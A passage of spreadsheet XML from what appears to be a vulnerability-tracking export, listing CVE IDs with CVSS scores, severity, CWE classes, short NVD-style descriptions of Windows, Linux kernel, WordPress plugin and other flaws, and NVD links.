      <c r="L1977" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t>
        </is>
      </c>
    </row>
    <row r="1978">
      <c r="A1978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69714</t>
        </is>
      </c>
      <c r="C1978" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1978" s="5" t="inlineStr"/>
      <c r="F1978" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1978" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1978" s="5" t="inlineStr"/>
      <c r="I1978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1978" s="5" t="inlineStr"/>
      <c r="K1978" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1978" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t>
        </is>
      </c>
    </row>
    <row r="1979">
      <c r="A1979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69717</t>
        </is>
      </c>
      <c r="C1979" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1979" s="5" t="inlineStr"/>
      <c r="F1979" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1979" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1979" s="5" t="inlineStr"/>
      <c r="I1979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1979" s="5" t="inlineStr"/>
      <c r="K1979" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="L1979" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t>
        </is>
      </c>
    </row>
    <row r="1980">
      <c r="A1980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="C1980" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1980" s="5" t="inlineStr"/>
      <c r="F1980" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1980" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1980" s="5" t="inlineStr"/>
      <c r="I1980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1980" s="5" t="inlineStr"/>
      <c r="K1980" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1980" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="1981">
      <c r="A1981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69762</t>
        </is>
      </c>
      <c r="C1981" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1981" s="5" t="inlineStr"/>
      <c r="F1981" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1981" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1981" s="5" t="inlineStr"/>
      <c r="I1981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1981" s="5" t="inlineStr"/>
      <c r="K1981" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1981" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t>
        </is>
      </c>
    </row>
    <row r="1982">
      <c r="A1982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="C1982" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1982" s="5" t="inlineStr"/>
      <c r="F1982" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1982" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1982" s="5" t="inlineStr"/>
      <c r="I1982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1982" s="5" t="inlineStr"/>
      <c r="K1982" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1982" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="1983">
      <c r="A1983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="C1983" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1983" s="5" t="inlineStr"/>
      <c r="F1983" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1983" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1983" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I1983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1983" s="5" t="inlineStr"/>
      <c r="K1983" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1983" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="M1983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="1984">
      <c r="A1984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69807</t>
        </is>
      </c>
      <c r="C1984" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1984" s="5" t="inlineStr"/>
      <c r="F1984" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1984" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1984" s="5" t="inlineStr"/>
      <c r="I1984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1984" s="5" t="inlineStr"/>
      <c r="K1984" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1984" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t>
        </is>
      </c>
    </row>
    <row r="1985">
      <c r="A1985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="C1985" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1985" s="5" t="inlineStr"/>
      <c r="F1985" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1985" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1985" s="5" t="inlineStr"/>
      <c r="I1985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1985" s="5" t="inlineStr"/>
      <c r="K1985" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1985" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="1986">
      <c r="A1986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="C1986" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1986" s="5" t="inlineStr"/>
      <c r="F1986" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1986" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H198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986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1986" s="5" t="inlineStr"/>
      <c r="K1986" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1986" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M1986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="1987">
      <c r="A1987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="C1987" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1987" s="5" t="inlineStr"/>
      <c r="F1987" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1987" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1987" s="5" t="inlineStr"/>
      <c r="I1987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1987" s="5" t="inlineStr"/>
      <c r="K1987" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L1987" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="1988">
      <c r="A1988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="C1988" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1988" s="5" t="inlineStr"/>
      <c r="F1988" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1988" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1988" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1988" s="5" t="inlineStr"/>
      <c r="K1988" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L1988" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M1988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="1989">
      <c r="A1989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71312</t>
        </is>
      </c>
      <c r="C1989" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1989" s="5" t="inlineStr"/>
      <c r="F1989" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1989" s="5" t="inlineStr"/>
      <c r="H1989" s="5" t="inlineStr"/>
      <c r="I1989" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1989" s="5" t="inlineStr"/>
      <c r="K1989" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1989" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to v1.75.0, rclone interpolates remote SFTP paths into PowerShell hash commands in backend/sftp/sftp.go, and quoteOrEscapeShellPath escapes only ASCII apostrophe even though PowerShell treats U+2018, U+2019, U+201A, and U+201B as single-quote delimiters, allowing an attacker-controlled filename to terminate the intended path literal and append PowerShell statements that execute as the victim SSH account when server-side hashing is invoked. This issue is fixed in v1.75.0.</t>
        </is>
      </c>
      <c r="M1989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71312</t>
        </is>
      </c>
    </row>
    <row r="1990">
      <c r="A1990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76139</t>
        </is>
      </c>
      <c r="C1990" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1990" s="5" t="inlineStr"/>
      <c r="F1990" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1990" s="5" t="inlineStr"/>
      <c r="H1990" s="5" t="inlineStr"/>
      <c r="I1990" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1990" s="5" t="inlineStr"/>
      <c r="K1990" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L1990" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in acm-operator-bundle. The build process for this component downloads and runs a script from a remote source without verifying its authenticity or integrity. This script gains access to sensitive credentials, such as GitHub access tokens and registry passwords, used in the build environment. A remote attacker could exploit this vulnerability to inject malicious code, leading to unauthorized access to build resources and potential compromise of the resulting operator bundle.</t>
        </is>
      </c>
      <c r="M1990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76139</t>
        </is>
      </c>
    </row>
    <row r="1991">
      <c r="A1991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79755</t>
        </is>
      </c>
      <c r="C1991" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1991" s="5" t="inlineStr"/>
      <c r="F1991" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1991" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1991" s="5" t="inlineStr"/>
      <c r="I1991" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1991" s="5" t="inlineStr"/>
      <c r="K1991" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1991" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, on the Nuclio local Docker platform, the function namespace is interpolated—unvalidated—into a double-quoted docker ps --filter "label=nuclio.io/namespace=&lt;value&gt;" command that is executed via the host shell (/bin/sh -c). Because the default auth kind is nop (unauthenticated), a remote attacker can inject arbitrary OS commands that run as root inside the dashboard container, which holds the Docker socket → host compromise. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="M1991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79755</t>
        </is>
      </c>
    </row>
    <row r="1992">
      <c r="A1992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83948</t>
        </is>
      </c>
      <c r="C1992" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1992" s="5" t="inlineStr"/>
      <c r="F1992" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1992" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H1992" s="5" t="inlineStr"/>
      <c r="I1992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1992" s="5" t="inlineStr"/>
      <c r="K1992" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1992" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t>
        </is>
      </c>
    </row>
    <row r="1993">
      <c r="A1993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84934</t>
        </is>
      </c>
      <c r="C1993" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1993" s="5" t="inlineStr"/>
      <c r="F1993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1993" s="5" t="inlineStr"/>
      <c r="H1993" s="5" t="inlineStr"/>
      <c r="I1993" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1993" s="5" t="inlineStr"/>
      <c r="K1993" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1993" s="5" t="inlineStr">
        <is>
          <t>The JCH Optimize WordPress plugin before 6.0.1 does not perform a capability check on one of its authenticated AJAX actions and lets the request choose which internal action runs, allowing any authenticated users such as Subscribers to import arbitrary JCH Optimize WordPress plugin before 6.0.1 settings and store a script that executes in the browser of any visitor or administrator viewing the site.</t>
        </is>
      </c>
      <c r="M1993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84934</t>
        </is>
      </c>
    </row>
    <row r="1994">
      <c r="A1994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84935</t>
        </is>
      </c>
      <c r="C1994" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1994" s="5" t="inlineStr"/>
      <c r="F1994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1994" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1994" s="5" t="inlineStr"/>
      <c r="I1994" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1994" s="5" t="inlineStr"/>
      <c r="K1994" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1994" s="5" t="inlineStr">
        <is>
          <t>The HT Menu  WordPress plugin before 1.2.7 does not perform any capability or object-ownership check when saving navigation menu-item settings, and does not escape those stored settings when the menu is rendered, allowing users with minimal permissions such as Subscribers to store JavaScript that executes in the browser of any visitor, administrators included, who views the affected menu.</t>
        </is>
      </c>
      <c r="M1994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84935</t>
        </is>
      </c>
    </row>
    <row r="1995">
      <c r="A1995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86140</t>
        </is>
      </c>
      <c r="C1995" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1995" s="5" t="inlineStr"/>
      <c r="F1995" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1995" s="5" t="inlineStr"/>
      <c r="H1995" s="5" t="inlineStr"/>
      <c r="I1995" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1995" s="5" t="inlineStr"/>
      <c r="K1995" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1995" s="5" t="inlineStr">
        <is>
          <t>In libxml2 before 2.15.4, xmlSnprintfElements in valid.c has a strcat stack-based buffer overflow.</t>
        </is>
      </c>
      <c r="M1995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86140</t>
        </is>
      </c>
    </row>
    <row r="1996">
      <c r="A1996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43133</t>
        </is>
      </c>
      <c r="C1996" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1996" s="5" t="inlineStr"/>
      <c r="F1996" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1996" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1996" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1996" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J1996" s="5" t="inlineStr"/>
      <c r="K1996" s="5" t="inlineStr">
        <is>
          <t>CWE-628</t>
        </is>
      </c>
      <c r="L1996" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nSVM: Always use vmcb01 in VMLOAD/VMSAVE emulation
Commit cc3ed80ae69f ("KVM: nSVM: always use vmcb01 to for vmsave/vmload
of guest state") made KVM always use vmcb01 for the fields controlled by
VMSAVE/VMLOAD, but it missed updating the VMLOAD/VMSAVE emulation code
to always use vmcb01.
As a result, if VMSAVE/VMLOAD is executed by an L2 guest and is not
intercepted by L1, KVM will mistakenly use vmcb02. Always use vmcb01
instead of the current VMCB.</t>
        </is>
      </c>
      <c r="M1996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43133</t>
        </is>
      </c>
    </row>
    <row r="1997">
      <c r="A1997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44629</t>
        </is>
      </c>
      <c r="C1997" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1997" s="5" t="inlineStr"/>
      <c r="F1997" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1997" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1997" s="5" t="inlineStr"/>
      <c r="I1997" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1997" s="5" t="inlineStr"/>
      <c r="K1997" s="5" t="inlineStr">
        <is>
          <t>CWE-922</t>
        </is>
      </c>
      <c r="L1997" s="5" t="inlineStr">
        <is>
          <t>Improper access control to the Synergis Softwire installation folder. This vulnerability affects Streamvault all-in-one appliances (SV-100E and SV-300E series) and Synergis Softwire installed on Windows servers.</t>
        </is>
      </c>
      <c r="M1997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44629</t>
        </is>
      </c>
    </row>
    <row r="1998">
      <c r="A1998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6726</t>
        </is>
      </c>
      <c r="C1998" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1998" s="5" t="inlineStr"/>
      <c r="F1998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1998" s="5" t="inlineStr"/>
      <c r="H1998" s="5" t="inlineStr"/>
      <c r="I1998" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1998" s="5" t="inlineStr"/>
      <c r="K1998" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L1998" s="5" t="inlineStr">
        <is>
          <t>An information leakage vulnerability was reported in the TCG TPM 2.0 reference code that could allow a local attacker with elevated privileges to obtain a credential from a TPM-aware CA for a falsified TPM key (such as an Attestation Key, DevID Key or TLS authentication key) and falsify other TPM 2.0 attestations with this key.  See also TCG VRT0010.</t>
        </is>
      </c>
      <c r="M1998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6726</t>
        </is>
      </c>
    </row>
    <row r="1999">
      <c r="A1999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82636</t>
        </is>
      </c>
      <c r="C1999" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1999" s="5" t="inlineStr"/>
      <c r="F1999" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1999" s="5" t="inlineStr"/>
      <c r="H1999" s="5" t="inlineStr"/>
      <c r="I1999" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1999" s="5" t="inlineStr"/>
      <c r="K1999" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1999" s="5" t="inlineStr">
        <is>
          <t>Qubes OS before qubes-core-dom0-linux 4.3.22 allows OS command injection during a qvm-copy-to-vm call from dom0 to an attacker-controlled qube, because the "system" library function is used to process an error message that may have shell metacharacters. This occurs in core-admin-linux/file-copy-vm/qfile-dom0-agent.c.</t>
        </is>
      </c>
      <c r="M1999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82636</t>
        </is>
      </c>
    </row>
    <row r="2000">
      <c r="A2000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85649</t>
        </is>
      </c>
      <c r="C2000" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D2000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
